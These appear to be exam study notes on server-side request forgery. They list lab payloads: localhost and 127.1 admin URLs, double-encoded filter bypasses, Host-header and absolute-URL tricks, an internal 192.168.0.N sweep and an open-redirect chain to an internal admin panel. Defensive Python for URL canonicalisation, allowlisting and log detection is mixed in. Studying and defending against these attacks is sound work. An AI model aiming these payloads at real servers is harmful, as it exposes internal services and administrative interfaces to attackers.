# SSRF

> An SSRF attack causes the server to make connections to internal services within the organization, or forces the server to connect to arbitrary external systems, potentially leaking sensitive data. Burp Scanner may report an SSRF issue as `External service interaction (HTTP)`.

> SSRF sample payloads:

```
/product/nextProduct?currentProductId=6&path=https://EXPLOIT.net  

stockApi=http://localhost:6566/admin  

http://127.1:6566/admin  

Host: localhost
```

> Alternative IP representations of `127.0.0.1`:

1. 2130706433 (decimal)
2. 017700000001 (octal)
3. 127.1 (shortened dotted form)

### Bypass blacklist filter

> Double URL-encode characters in the URL to **obfuscate** the `a` in `admin` as `%2561`, bypassing the blacklist filter.

> ***Identify*** the SSRF in the `stockAPI` parameter, and bypass the block by changing the target URL for the localhost admin endpoint to `http://127.1/%2561dmin`.
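The two bypasses above (alternative loopback literals and double encoding) work because the filter compares the raw string instead of a canonical form. Added example, not from the original notes: a Python check that normalises the host with `inet_aton`-style parsing, decodes until the value stops changing, and then applies an allowlist; the naive substring blacklist is shown beside it so the difference is visible. The allowlist host `stock.example.net` is a constructed assumption, and a real deployment would additionally resolve DNS names and re-check the address right before connecting.

```python
import ipaddress
from urllib.parse import unquote, urlsplit

# Hosts the stock checker is allowed to reach (constructed allowlist for this example).
ALLOWED_HOSTS = {"stock.example.net"}
ALLOWED_SCHEMES = {"http", "https"}


def _parse_component(text: str) -> int:
    """One dotted component under the C inet_aton() rules:
    0x.. is hex, a leading 0 means octal, anything else is decimal."""
    if text[:2].lower() == "0x":
        return int(text[2:], 16)
    if len(text) > 1 and text[0] == "0":
        return int(text, 8)
    return int(text, 10)


def parse_ipv4_literal(host: str):
    """Interpret host the way inet_aton() does, so that 2130706433,
    017700000001, 127.1 and 0x7f.1 all come back as 127.0.0.1.
    Returns an IPv4Address, or None if host is not such a literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or any(not (p.isascii() and p.isalnum()) for p in parts):
        return None
    try:
        values = [_parse_component(p) for p in parts]
    except ValueError:
        return None
    # Every component but the last is one byte; the last fills the remaining bytes.
    head, tail = values[:-1], values[-1]
    tail_bits = 8 * (5 - len(parts))
    if any(v > 0xFF for v in head) or tail >= (1 << tail_bits):
        return None
    address = tail
    for i, v in enumerate(head):
        address |= v << (8 * (3 - i))
    return ipaddress.IPv4Address(address)


def canonical_host(host: str) -> str:
    """Canonical host for policy decisions: IP literals become dotted-quad, names are lower-cased."""
    ip = parse_ipv4_literal(host)
    return str(ip) if ip is not None else host.lower()


def fully_decode(text: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing, so %2561 -> %61 -> a.
    Comparing against a blacklist after a single decode is what %2561dmin slips past."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def is_internal_host(host: str) -> bool:
    """True for loopback, RFC 1918, link-local, reserved and unspecified addresses
    and for the localhost name. A real deployment must also resolve DNS names and
    re-check the resolved address immediately before connecting (DNS rebinding)."""
    host = canonical_host(host)
    if host == "localhost" or host.endswith(".localhost"):
        return True
    ip = parse_ipv4_literal(host)
    if ip is None:
        return False
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_unspecified)


def naive_blacklist_blocks(url: str) -> bool:
    """The kind of filter the payloads above defeat: substring matching on the
    URL after a single decode, with no host canonicalisation."""
    probe = unquote(url).lower()
    return any(bad in probe for bad in ("localhost", "127.0.0.1", "/admin"))


def evaluate_target(url: str):
    """Allowlist decision for a server-side fetch. Returns (allowed, detail)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = canonical_host(parts.hostname or "")
    if is_internal_host(host):
        return False, f"internal target {host}"
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allowlist"
    return True, f"{parts.scheme}://{host}{fully_decode(parts.path)}"
```

`naive_blacklist_blocks("http://127.1/%2561dmin")` returns `False` (the request goes through), while `evaluate_target` on the same URL rejects it as an internal target; the allowlist means there is nothing to enumerate around.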

### Absolute URL and localhost Host header

```
GET https://TARGET.net/
Host: OASTIFY.COM
```

> ***Identify*** an SSRF caused by flawed request parsing by changing the `Host` header to the Collaborator server, providing an absolute URL in the GET request line, and observing the interaction received by the Collaborator server.


### Routing-based Host SSRF

> ***Identify*** routing-based SSRF by altering the **Host** header of the request and observing the response. Routing-based SSRF via the Host header allows insecure access to localhost and intranet hosts.

```
GET / HTTP/1.1
Host: 192.168.0.§0§
```

> Remember to add the CSRF token and session cookies.
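Both Host-header issues above (absolute-form request target disagreeing with `Host`, and a front end that routes on whatever `Host` says) come down to the same front-end rule: route only to configured virtual hosts and insist that the request line and `Host` agree. Added example, not from the original notes: a Python allowlist check for the `Host` header, a consistency check for absolute-form request targets, and a scan over constructed access-log lines that surfaces the Intruder-style sweep of `Host: 192.168.0.N` as many internal-host hits from one client. The vhost names `target.example`/`www.target.example`, the client IPs and the log layout are all constructed assumptions.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import urlsplit

# Virtual hosts this front end is configured to serve (constructed for the example).
KNOWN_VHOSTS = {"target.example", "www.target.example"}

HOST_VALUE = re.compile(r"(\[[0-9a-fA-F:.]+\]|[^\s:\[\]/]+)(?::(\d{1,5}))?")
REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d\.\d$")
# Constructed access-log layout: client "Host header" "request line" status
LOG_LINE = re.compile(r'^(\S+) "([^"]*)" "([^"]*)" (\d{3})$')


def split_host_header(value: str):
    """Split a Host header into (name, port); handles name, name:port and bracketed
    IPv6 literals. Returns None for malformed values."""
    m = HOST_VALUE.fullmatch(value.strip())
    if not m:
        return None
    port = int(m.group(2)) if m.group(2) else None
    if port is not None and port > 65535:
        return None
    return m.group(1).lower(), port


def classify_host(value: str) -> str:
    """known | internal | external-ip | unknown-name | malformed."""
    parsed = split_host_header(value)
    if parsed is None:
        return "malformed"
    name = parsed[0]
    if name in KNOWN_VHOSTS:
        return "known"
    literal = name[1:-1] if name.startswith("[") else name
    if literal == "localhost" or literal.endswith(".localhost"):
        return "internal"
    try:
        ip = ipaddress.ip_address(literal)   # dotted-quad / IPv6 only; shortened
    except ValueError:                        # forms such as 127.1 land in unknown-name
        return "unknown-name"
    if ip.is_loopback or ip.is_private or ip.is_link_local:
        return "internal"
    return "external-ip"


def host_header_allowed(value: str) -> bool:
    """Front-end policy: route only to configured virtual hosts and answer
    everything else (IP literals, unknown names, malformed values) with 421/400."""
    return classify_host(value) == "known"


def request_target_consistent(request_line: str, host_header: str):
    """For an absolute-form target (GET https://target.example/ HTTP/1.1) the
    authority in the request line must equal the Host header. A front end that
    routes on one while the back end trusts the other is the parsing flaw probed
    with a Collaborator hostname above. Returns (ok, reason)."""
    m = REQUEST_LINE.match(request_line)
    parsed = split_host_header(host_header)
    if not m or parsed is None:
        return False, "malformed request line or Host header"
    target = m.group(2)
    if target.startswith("/"):
        return True, "origin-form target"
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False, "unsupported request target"
    if parts.hostname.lower() != parsed[0]:
        return False, f"request-line host {parts.hostname!r} != Host {parsed[0]!r}"
    return True, "absolute-form target agrees with Host"


SAMPLE_LOG = """\
203.0.113.5 "target.example" "GET / HTTP/1.1" 200
203.0.113.5 "192.168.0.0" "GET / HTTP/1.1" 504
203.0.113.5 "192.168.0.1" "GET / HTTP/1.1" 504
203.0.113.5 "192.168.0.12" "GET /admin HTTP/1.1" 200
203.0.113.5 "localhost" "GET /admin HTTP/1.1" 404
198.51.100.7 "www.target.example" "GET /product?productId=1 HTTP/1.1" 200
"""


def scan_log(text: str, threshold: int = 3):
    """Per client, count requests whose Host is not a configured vhost. A client
    sweeping Host: 192.168.0.N shows up as many 'internal' hits from one source.
    Returns {client: Counter} for clients at or above the threshold."""
    per_client = {}
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, host, _request, _status = m.groups()
        per_client.setdefault(client, Counter())[classify_host(host)] += 1
    return {c: n for c, n in per_client.items()
            if sum(v for k, v in n.items() if k != "known") >= threshold}
```

The log scan is a detection signal rather than a fix: the actual fix is `host_header_allowed` at the front end, which makes the sweep return a 421/400 instead of a routed response.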

### Open redirection

The target makes a **GET** request to the ***next product*** on the e-commerce site, using a **path** parameter. In the stockAPI POST request, the value provided in the body is the partial path to the internal system. See the product page `source code` below.

> In this lab the admin interface is stated to be at `http://192.168.0.12:8080/admin`, but in the exam use `localhost:6566`.

```
https://TARGET.net/product/nextProduct?currentProductId=1&path=http%3a//192.168.0.12%3a8080/admin
```

> In the POST stock request, set the `stockApi` parameter to the partial path (not the absolute URL) taken from the `nextProduct` GET request URL.

```
stockApi=/product/nextProduct?currentProductId=1&path=http%3a//192.168.0.12%3a8080/admin
```
